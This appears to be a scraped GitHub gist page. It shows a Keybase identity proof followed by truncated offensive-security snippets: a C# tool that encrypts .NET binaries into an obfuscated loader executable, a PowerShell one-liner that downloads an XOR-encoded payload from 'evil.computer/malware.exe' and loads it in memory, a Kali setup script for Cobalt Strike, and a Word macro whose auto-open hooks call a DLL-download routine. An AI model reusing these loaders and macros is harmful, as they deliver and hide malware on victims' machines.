I hereby claim:
- I am vivami on github.
- I am vanmieghem (https://keybase.io/vanmieghem) on keybase.
- I have a public key whose fingerprint is D90D C025 6090 A35C BD62 C907 32F0 0526 6B85 75C8
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
String path = args[0]; | |
key = getRandomKey(); | |
String filename = Path.GetFileNameWithoutExtension(path).ToString(); | |
String obfuscatedBin = obfuscateBinary(path); | |
private String obfuscateBinary(String file) { | |
byte[] assemblyBytes = fileToByteArray(@file); | |
byte[] encryptedAssembly = encrypt(assemblyBytes, key); | |
return System.Convert.ToBase64String(encryptedAssembly); | |
} |
compile(srcFinal, filename + "_obfuscated.exe"); | |
static void compile(String source, String outfile) { | |
var provider_options = new Dictionary<string, string> | |
{ | |
{"CompilerVersion","v3.5"} | |
}; | |
var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options); | |
var compiler_params = new System.CodeDom.Compiler.CompilerParameters(); |
public static string srcTemplate = @"using System; | |
using System.Collections.Generic; | |
using System.IO; | |
using System.Reflection; | |
using System.Security.Cryptography; | |
namespace Loader { | |
public static class Loader { | |
private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc }; |
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials | |
$k="XOR\_KEY";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://evil.computer/malware.exe")))|%{$_-bxor$k[$i++%$k.length]} | |
[System.Reflection.Assembly]::Load($b) | Out-Null | |
$parameters=@("arg1", "arg2") | |
[namespace.Class]::Main($parameters) |
# update kali | |
apt update && apt upgrade -y | |
#install java8 for cobalt strike | |
cd /opt | |
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list | |
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list | |
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys eea14886 | |
apt-get -y update | |
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections |
Sub AutoOpen() | |
Debugging | |
End Sub | |
Sub Document_Open() | |
Debugging | |
End Sub | |
Public Function Debugging() As Variant | |
DownloadDLL |